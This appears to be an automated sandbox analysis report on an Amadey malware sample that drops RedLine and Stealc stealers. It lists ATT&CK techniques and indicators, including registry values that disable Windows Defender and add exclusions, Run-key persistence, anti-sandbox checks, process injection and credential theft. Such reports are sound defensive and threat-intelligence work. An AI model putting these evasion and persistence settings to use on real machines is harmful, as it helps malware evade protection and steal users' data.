amadey | dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 14 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1108-50-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/1108-51-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/1108-48-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/1108-45-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/1108-43-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
\Users\Admin\AppData\Roaming\MovqcuUWuS.exe	family_redline
behavioral1/memory/2248-95-0x0000000000380000-0x00000000003D2000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe	family_redline
behavioral1/memory/856-281-0x0000000000040000-0x0000000000092000-memory.dmp	family_redline
behavioral1/memory/1056-437-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/1056-444-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/1056-443-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/1056-442-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/1056-439-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

Waters.pifQuantumFlow.scr

description	pid	process	target process
PID 2600 created 1204	2600	Waters.pif	Explorer.EXE
PID 2600 created 1204	2600	Waters.pif	Explorer.EXE
PID 2252 created 1204	2252	QuantumFlow.scr	Explorer.EXE

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OJMRwiGdhyaHC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OJMRwiGdhyaHC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\efiAzqQKrQpqActHLvR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\PdOICyyFbClqQxVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HIoTiJfsoGzpkHVf = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HIoTiJfsoGzpkHVf = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BRWHUqYPU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\PdOICyyFbClqQxVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GqgEBhsSxktU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BRWHUqYPU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DsJnIJMlqPUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DsJnIJMlqPUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GqgEBhsSxktU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HIoTiJfsoGzpkHVf = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HIoTiJfsoGzpkHVf = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\efiAzqQKrQpqActHLvR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

axplong.exe33a79e7ec3.exedcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	33a79e7ec3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

266 3024 rundll32.exe

flow	pid	process
266	3024	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1752	powershell.exe
2540	powershell.exe
3520	powershell.EXE
3472	powershell.exe
2128	powershell.EXE
1856	powershell.exe
1924	powershell.exe
3596	powershell.exe
2600	powershell.EXE
916	powershell.exe
1668	powershell.exe
2688	powershell.exe
2644	powershell.exe
1548	powershell.exe

Downloads MZ/PE file

.NET Reactor proctector 9 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/1720-539-0x0000000000920000-0x0000000002328000-memory.dmp	net_reactor
behavioral1/memory/1720-540-0x0000000000920000-0x0000000002328000-memory.dmp	net_reactor
behavioral1/memory/1720-843-0x0000000000920000-0x0000000002328000-memory.dmp	net_reactor
behavioral1/memory/2920-872-0x0000000000290000-0x0000000001C98000-memory.dmp	net_reactor
behavioral1/memory/2920-876-0x0000000000290000-0x0000000001C98000-memory.dmp	net_reactor
behavioral1/memory/3384-1330-0x0000000000360000-0x0000000001D68000-memory.dmp	net_reactor
behavioral1/memory/2572-2039-0x0000000000EE0000-0x00000000028E8000-memory.dmp	net_reactor
behavioral1/memory/2520-2086-0x0000000000160000-0x0000000001B68000-memory.dmp	net_reactor
behavioral1/memory/3708-2135-0x0000000000390000-0x0000000001D98000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

33a79e7ec3.exerundll32.exedcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exeaxplong.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	33a79e7ec3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	33a79e7ec3.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

OlHGHzZ.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation	OlHGHzZ.exe

Drops startup file 4 IoCs

Processes:

cmd.exeexplorer.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	explorer.exe

Executes dropped EXE 41 IoCs

Processes:

axplong.exegold.execrypteda.exeT3USPjGDkV.exeMovqcuUWuS.exeNework.exeHkbsse.exestealc_default2.exeneedmoney.exepenis.exebundle.exesvchost015.exeacentric.exe2.exeJavvvUmar.exesplwow64.execrypted.exeWaters.pif385121.exeInstall.exeInstall.exeexplorer.exe33a79e7ec3.exee0e4b0e858.exeexplorer.exefIQqLZn.exeservice123.exeshopfree.exeqvipgc.exeujqwfi.execymaxl.exeOlHGHzZ.exeexplorer.exeservice123.exeexplorer.exeservice123.exeexplorer.exeservice123.exeexplorer.exeservice123.exeQuantumFlow.scr

pid	process
796	axplong.exe
2172	gold.exe
2124	crypteda.exe
920	T3USPjGDkV.exe
2248	MovqcuUWuS.exe
2468	Nework.exe
1512	Hkbsse.exe
2088	stealc_default2.exe
2368	needmoney.exe
1032	penis.exe
856	bundle.exe
2492	svchost015.exe
2516	acentric.exe
2644	2.exe
2528	JavvvUmar.exe
2376	splwow64.exe
2440	crypted.exe
2600	Waters.pif
3020	385121.exe
700	Install.exe
2304	Install.exe
1720	explorer.exe
1768	33a79e7ec3.exe
1604	e0e4b0e858.exe
2920	explorer.exe
348	fIQqLZn.exe
2200	service123.exe
3696	shopfree.exe
2124	qvipgc.exe
3432	ujqwfi.exe
3028	cymaxl.exe
3868	OlHGHzZ.exe
3384	explorer.exe
3372	service123.exe
2572	explorer.exe
3320	service123.exe
2520	explorer.exe
2424	service123.exe
3708	explorer.exe
3748	service123.exe
2252	QuantumFlow.scr

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exeaxplong.exe33a79e7ec3.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Wine	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
Key opened	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Wine	33a79e7ec3.exe

Indirect Command Execution 1 TTPs 19 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

Processes:

forfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exe

pid	process
1668	forfiles.exe
3228	forfiles.exe
3136	forfiles.exe
1708	forfiles.exe
2200	forfiles.exe
2152	forfiles.exe
3324	forfiles.exe
1700	forfiles.exe
568	forfiles.exe
1448	forfiles.exe
3024	forfiles.exe
2500	forfiles.exe
3812	forfiles.exe
952	forfiles.exe
2408	forfiles.exe
1288	forfiles.exe
1032	forfiles.exe
2844	forfiles.exe
2100	forfiles.exe

Loads dropped DLL 64 IoCs

Processes:

dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exeaxplong.execrypteda.exeNework.exeneedmoney.exe2.exestealc_default2.exeHkbsse.execmd.exe385121.exeInstall.exeInstall.exeexplorer.exeJavvvUmar.exeservice123.exeWerFault.exeservice123.exerundll32.exeWerFault.exeWerFault.exe

pid	process
1728	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
796	axplong.exe
796	axplong.exe
796	axplong.exe
2124	crypteda.exe
2124	crypteda.exe
796	axplong.exe
2468	Nework.exe
796	axplong.exe
796	axplong.exe
796	axplong.exe
796	axplong.exe
796	axplong.exe
796	axplong.exe
2368	needmoney.exe
796	axplong.exe
796	axplong.exe
2644	2.exe
2088	stealc_default2.exe
2088	stealc_default2.exe
1512	Hkbsse.exe
1512	Hkbsse.exe
796	axplong.exe
796	axplong.exe
2176	cmd.exe
796	axplong.exe
3020	385121.exe
3020	385121.exe
3020	385121.exe
3020	385121.exe
700	Install.exe
700	Install.exe
700	Install.exe
700	Install.exe
2304	Install.exe
2304	Install.exe
2304	Install.exe
796	axplong.exe
796	axplong.exe
796	axplong.exe
796	axplong.exe
1720	explorer.exe
2528	JavvvUmar.exe
2528	JavvvUmar.exe
2200	service123.exe
796	axplong.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1760	WerFault.exe
1760	WerFault.exe
1760	WerFault.exe
3372	service123.exe
3024	rundll32.exe
3024	rundll32.exe
3024	rundll32.exe
3024	rundll32.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2420	WerFault.exe
2420	WerFault.exe
2420	WerFault.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

axplong.exeexplorer.exeacentric.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\splwow64.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000287001\\splwow64.exe"	axplong.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\33a79e7ec3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000308001\\33a79e7ec3.exe"	axplong.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\e0e4b0e858.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000309001\\e0e4b0e858.exe"	axplong.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\ProgramData\\explorer.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update"	acentric.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

OlHGHzZ.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	OlHGHzZ.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	OlHGHzZ.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

166 raw.githubusercontent.com
169 raw.githubusercontent.com
176 raw.githubusercontent.com
177 raw.githubusercontent.com
180 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

39 ip-api.com

flow	ioc
166	raw.githubusercontent.com
169	raw.githubusercontent.com
176	raw.githubusercontent.com
177	raw.githubusercontent.com
180	raw.githubusercontent.com

flow	ioc
39	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000309001\e0e4b0e858.exe	autoit_exe

Drops file in System32 directory 27 IoCs

Processes:

fIQqLZn.exepowershell.EXEOlHGHzZ.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	fIQqLZn.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	OlHGHzZ.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	OlHGHzZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	OlHGHzZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F	OlHGHzZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D	OlHGHzZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D	OlHGHzZ.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	fIQqLZn.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	OlHGHzZ.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	OlHGHzZ.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	fIQqLZn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174	OlHGHzZ.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	fIQqLZn.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	OlHGHzZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F	OlHGHzZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174	OlHGHzZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2384 tasklist.exe
1600 tasklist.exe

pid	process
2384	tasklist.exe
1600	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 36 IoCs

Processes:

dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exeaxplong.exeexplorer.exe33a79e7ec3.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
1728	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
796	axplong.exe
1720	explorer.exe
1768	33a79e7ec3.exe
1720	explorer.exe
1720	explorer.exe
2920	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
3384	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
2572	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
2520	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
1720	explorer.exe
3708	explorer.exe
1720	explorer.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

gold.exeneedmoney.execrypted.exe

description	pid	process	target process
PID 2172 set thread context of 1108	2172	gold.exe	RegAsm.exe
PID 2368 set thread context of 2492	2368	needmoney.exe	svchost015.exe
PID 2440 set thread context of 1056	2440	crypted.exe	RegAsm.exe

Drops file in Program Files directory 13 IoCs

Processes:

OlHGHzZ.exe

description	ioc	process
File created	C:\Program Files (x86)\BRWHUqYPU\kdozuSG.xml	OlHGHzZ.exe
File created	C:\Program Files (x86)\efiAzqQKrQpqActHLvR\capcvzU.dll	OlHGHzZ.exe
File created	C:\Program Files (x86)\OJMRwiGdhyaHC\sCszMRs.dll	OlHGHzZ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	OlHGHzZ.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	OlHGHzZ.exe
File created	C:\Program Files (x86)\GqgEBhsSxktU2\qDZQbYD.xml	OlHGHzZ.exe
File created	C:\Program Files (x86)\OJMRwiGdhyaHC\cNYxSCn.xml	OlHGHzZ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	OlHGHzZ.exe
File created	C:\Program Files (x86)\GqgEBhsSxktU2\APZiMvkAVYSqq.dll	OlHGHzZ.exe
File created	C:\Program Files (x86)\efiAzqQKrQpqActHLvR\hQgyTgi.xml	OlHGHzZ.exe
File created	C:\Program Files (x86)\DsJnIJMlqPUn\ptDRBIT.dll	OlHGHzZ.exe
File created	C:\Program Files (x86)\BRWHUqYPU\PivAYq.dll	OlHGHzZ.exe
